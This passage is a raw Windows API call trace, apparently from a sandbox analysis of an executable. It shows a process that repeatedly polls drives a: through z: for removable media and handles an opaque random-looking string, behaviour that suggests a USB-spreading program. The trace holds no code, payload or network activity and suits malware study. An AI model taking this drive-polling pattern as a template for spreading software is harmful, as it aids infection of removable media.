(lpRootPathName="e:\\") returned 0x1 [0217.135] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.135] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.136] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.136] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.136] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.136] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.137] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.137] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.137] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.137] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.138] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.138] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.138] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.138] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.138] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.139] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.139] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.139] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.139] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.139] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.140] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.141] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.141] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.141] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.141] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.141] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.141] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0217.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0217.142] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0217.142] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.143] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.143] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.143] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0217.143] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.144] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.144] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.144] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.144] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.144] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.145] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.145] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.145] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.145] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.145] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.146] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.146] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.146] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.146] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.146] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.147] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.147] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.147] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.147] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.148] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.148] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.148] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.148] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.148] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.149] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.149] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.149] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0217.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0217.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.152] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.152] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.152] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.152] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.152] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.153] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.153] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.153] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.153] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.154] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.154] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.154] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.154] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.154] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.155] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.155] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.155] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.155] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.156] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.156] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.156] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.156] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.156] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.157] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.157] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.158] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.158] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.158] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.158] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.158] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.159] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.159] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.159] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.160] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0217.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0217.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.161] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.161] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.161] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.162] RtlAllocateHeap 